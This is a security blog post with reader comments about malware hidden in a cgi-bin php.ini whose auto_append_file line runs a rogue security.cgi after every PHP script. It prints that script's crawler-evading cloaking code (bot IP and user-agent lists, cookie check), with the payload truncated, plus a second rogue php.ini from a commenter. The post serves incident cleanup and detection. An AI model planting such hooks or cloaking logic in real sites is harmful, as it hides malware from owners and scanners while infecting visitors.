A new place to hide web-based malware: php.ini + cgi-bin

We got a call this weekend from a desperate site owner who had just found out that his site was hacked and hosting malware. He was fairly technical and had checked everywhere for it. He had even reverted to an old backup he knew was clean, but the problem persisted.

When he explained the problem to me, I was 99% sure it was something inserted into the .htaccess file. Well, I was wrong. I checked the site as well and didn’t find anything hidden in the usual places.

I then remembered a report from another user, and one from stopmalvertising.com, about malware being hidden inside the cgi-bin directory.

Most people forget to check the cgi-bin directory because it sits outside htdocs and is not targeted that often.

When we checked that directory, we found a php.ini file containing:

auto_append_file = "/home/user/USER/cgi-bin/security.cgi"
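For context, auto_append_file is a standard (and normally benign) php.ini directive: PHP parses and executes the named file after every script it runs, and its auto_prepend_file counterpart runs a file before every script. A legitimate use looks something like this (the paths are purely illustrative):

```ini
; Benign illustration of the same mechanism (paths are made up):
auto_prepend_file = "/var/www/example/header.php"  ; runs before every script
auto_append_file  = "/var/www/example/footer.php"  ; runs after every script
```

Because the directive applies to every PHP request the ini file governs, a single rogue line like the one above is enough to inject the attacker's code site-wide.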

What it does is execute this security.cgi file at the end of every PHP script the site serves. When we checked the file, this is what it looked like:

function detectBot(){
    global $is_human, $stop_agent_detected, $stop_ip_detected, $detected_str;

    // IP masks for known crawlers (several entries were blanked out in the
    // published sample):
    $stop_ips_masks = array(
        "66.249.[6-9][0-9].[0-9]+", // Google NetRange: -
        "74.125.[0-9]+.[0-9]+",     // Google NetRange: -
        "65.5[2-5].[0-9]+.[0-9]+",  // MSN NetRange: -
        "74.6.[0-9]+.[0-9]+",       // Yahoo NetRange: -
        "67.195.[0-9]+.[0-9]+",     // Yahoo#2 NetRange: -
        "72.30.[0-9]+.[0-9]+",      // Yahoo#3 NetRange: -
        "38.[0-9]+.[0-9]+.[0-9]+",  // Cuill: NetRange: -
        "",                         // MacFinder
        "",                         // Wells Search II
        "",                         // Indy Library
    );

    // Substrings that identify crawlers and scripted clients by User-Agent:
    $stop_agents_masks = array("http", "google", "slurp", "msnbot", "bot",
        "crawler", "spider", "robot", "HttpClient", "curl", "PHP",
        "Indy Library", "WordPress");

    $_SERVER["HTTP_USER_AGENT"] = preg_replace("|User.Agent:[s ]?|i", "", @$_SERVER["HTTP_USER_AGENT"]);

    $is_human = true; $stop_ip_detected = false; $stop_agent_detected = false; $detected_str = "";

    // First pass: match the visitor's IP against the crawler ranges
    // (eregi is the old pre-PHP-5.3 POSIX regex function).
    foreach ($stop_ips_masks as $stop_ip_mask)
        if (eregi("^{$stop_ip_mask}$", defineIP())) {
            $is_human = false; $stop_ip_detected = true; $detected_str = "by ip"; break;
        }

    // Second pass: match the User-Agent against the crawler substrings.
    if ($is_human)
        foreach ($stop_agents_masks as $stop_agents_mask)
            if (eregi($stop_agents_mask, @$_SERVER["HTTP_USER_AGENT"]) !== false) {
                $is_human = false; $stop_agent_detected = true; $detected_str = "by agent"; break;
            }

    // Anything that does not start with at least five letters is assumed
    // not to be a real browser.
    if ($is_human and !eregi("^[a-zA-Z]{5,}", @$_SERVER["HTTP_USER_AGENT"])) {
        $is_human = false; $stop_agent_detected = true; $detected_str = "not human agent";
    }
}

function defineIP(){
    // The first branch of this function was lost in the published sample;
    // only the fallback survived:
    return $_SERVER['REMOTE_ADDR'];
}

// Only "human" visitors without the marker cookie get the payload; the
// payload itself was truncated in the published sample:
if (!isset($_COOKIE["cook"]) && $is_human)

It is exactly the same as the counter.cgi reported by stopmalvertising.com.

So if you ever have to clean a hacked web site, don’t forget to check the cgi-bin directory and any php.ini files.
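As a rough sketch of that check, a sweep like the following will surface stray php.ini files and any append/prepend hooks inside them. The mock directory here exists only to make the example self-contained; in a real cleanup, point the scan at the account root instead:

```shell
# Build a mock account layout so the example is self-contained.
site=$(mktemp -d)
mkdir -p "$site/cgi-bin"
printf 'auto_append_file = "%s/cgi-bin/security.cgi"\n' "$site" \
    > "$site/cgi-bin/php.ini"

# 1. List every php.ini (and per-directory .user.ini) under the account:
find "$site" \( -name 'php.ini' -o -name '.user.ini' \) -type f

# 2. Flag append/prepend hooks anywhere in those files:
grep -RniE 'auto_(append|prepend)_file' "$site"
```

Any hit from step 2 that you did not put there yourself deserves a close look.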

As always, if you need help to recover from this attack or need someone to monitor your web site for these issues, visit http://sucuri.net or just send us an email at contact@sucuri.net.

About David Dede

David Dede is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

  • Interesting – I haven't seen it in a php.ini file before. Why would it append that script to any PHP file if the php.ini location is set to the default though? If you don't tell PHP to look somewhere else for a php.ini file, it will assume the standard system locations for it. You could have 100 files named php.ini, but if nothing on the server is looking at it for instructions, it shouldn't matter, no?

    I've found backdoors in the cgi-bin (which the site owner naturally didn't check because they weren't running cgi scripts), and also in the images directory, since folks usually skip checking that because of the volume of images they have, and because they don't normally keep scripted files there.

    Here's a quick rundown of the last one I ran into with files inserted into the cgi-bin:
    (This was a wordpress-specific hack, but with very little modification could have worked with any vulnerable site.)

    Thanks for the tip!

  • Anonymous

    A quick tip-

    From your web root, `find . -mtime -15` will find all files modified in the last 15 days. Use a few variations on that theme, and the files that don't belong quickly jump out at you.

    Very useful for cleaning up sites that got hacked, as those evil baddies rarely put just one piece of malware in.
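    A few variations on that theme could look like the sketch below (the cutoffs are arbitrary; the mock files exist only so the example runs on its own):

    ```shell
    # Mock web root with one recently modified file and one old one:
    root=$(mktemp -d)
    touch "$root/recent.php"
    touch -d '30 days ago' "$root/old.php" 2>/dev/null \
        || touch -t 202001010000 "$root/old.php"   # fallback for BSD touch

    find "$root" -mtime -15 -type f              # changed in the last 15 days
    find "$root" -mtime -15 -name '*.php'        # only recently changed PHP
    find "$root" -newer "$root/old.php" -type f  # changed since a known-good file
    ```

    Comparing against a file you know predates the compromise (`-newer`) is often the quickest way to narrow the list.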

  • Now that is an interesting post! Thanks for sharing this useful information about PHP. Greetings

  • Had a similar hack just happen to a client's new site (hosting set up two weeks ago) hosted on Network Solutions. The only files in the cgi-bin were fileman.cgi, global.dat, php.dat and a newly modified php.ini. The php.ini contained:

    display_errors= off;
    auto_append_file = .cws;

    A copy of the .cws file was scattered around in different places (image directories that could easily be found by looking in the html source code). It contained the same thing you point to in the security.cgi file in your article.

    I do have some PHP on the site, but nothing that writes anything (just dynamic menu processing and some file reads)… so I can only assume the fileman.cgi was the entry point. I deleted the files in cgi-bin and all the bogus .cws files. We'll see if it shows up again. If not, then I have to assume it was the fileman.cgi.